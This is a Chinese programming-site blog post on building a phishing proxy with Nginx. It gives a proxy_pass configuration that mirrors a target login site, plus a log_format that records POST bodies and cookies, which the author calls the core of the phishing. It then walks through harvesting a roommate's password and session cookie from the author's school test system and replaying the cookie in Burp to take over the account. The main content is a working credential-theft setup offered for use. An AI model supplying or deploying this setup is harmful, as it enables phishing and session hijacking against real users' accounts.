文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

Nginx反向代理钓鱼怎么实现

2023-06-17 04:21

关注

本篇内容主要讲解“Nginx反向代理钓鱼怎么实现”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Nginx反向代理钓鱼怎么实现”吧!

什么是反向代理

这里我找了一段比较官方的解释。

反向代理(Reverse Proxy)是指以代理服务器来接受 Internet  上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给 Internet  上请求连接的客户端,此时代理服务器对外就表现为一个服务器。我自己的理解 代理服务器就是充当了一个“中间人”。如果理解的不恰当还请师傅们指出来哈。

Nginx反向代理实例

这里拿我的一台vps做演示 ip:39.xxx.xxx.x。因为vps上装了宝塔 而且 又在宝塔里装了Nginx。

首先找到Nginx的目录。在我的vps上 目录是/www/server/nginx/

找到/www/server/nginx/config/nginx.conf文件

反向代理 https://www.xxx.com/

location / {    #如果后端的服务器返回 502、504、执行超时等错误,自动将请求转发到 upstream 负载均衡池中的 另一台服务器,实现故障转移。       proxy_next_upstream http_502 http_504 error timeout invalid_header;     proxy_pass https://www.xxx.com/;     proxy_set_header Host 39.xxx.xxx.9;     proxy_set_header X-Forwarded-For $remote_addr;   }

proxy_set_header 指令用于在向反向代理的后端 Web 服务器发起请求时添加指定的 Header头信息。

当后端 Web 服务器上有多个基于域名的虚拟主机时,要通过添加 Header 头信息 Host,用于指定请求的域名,这样后端 Web  服务器才能识别该反向代理访问请求由哪一个虚拟主机来处理。(39.xxx.xxx.9是我的vps地址。www.xxx.com是要反向代理的目标)

Nginx反向代理钓鱼怎么实现

最后我们还需要制定以下 访问日志需要获取的内容 也是在nginx.conf里修改.在http下

log_format TestLog escape=json '$request_filename $http_x_forwarded_for $fastcgi_script_name $document_root $request_body' $http_cookie;
Nginx反向代理钓鱼怎么实现

TestLog 要和上面的access_log对应不然日志不会起作用。

重点是$request_body(获取post数据),$http_cookie(获取cookie数据)这就是我们钓鱼的核心了。当有人访问并登陆我们反向代理的网站以后  我们点开日志就可以看到他的cookie和post提交的用户名和密码了。

反向代理钓鱼实例

这里我用我们学校的一个测试系统举例子 按照上面步骤反向代理学校的测试系统

Nginx反向代理钓鱼怎么实现

之后看到一个一模一样的界面。为了怕学校领导找上门来我把css都撤了 哈哈哈。

这时候叫上万能的舍友来登陆一波康康。

Nginx反向代理钓鱼怎么实现

根据Nginx.conf确定日志路径在/www/wwwlogs/access.log。讲道理舍友登陆了以后应该记录了  他登陆时提交的post 里面应该包含账号密码。和登录后的cookie信息。

Nginx反向代理钓鱼怎么实现

访问日志后看到登陆时的账号密码。目标站为https  不过问题不大JSESSIONID后面的是获取到舍友登陆后的cookie。直接替换cookie即可登陆舍友的账号。

Nginx反向代理钓鱼怎么实现

burp进行正则匹配cookie后进行替换。最后成功登陆。

Nginx反向代理钓鱼怎么实现

到此,相信大家对“Nginx反向代理钓鱼怎么实现”有了更深的了解,不妨来实际操作一番吧!这里是编程网网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯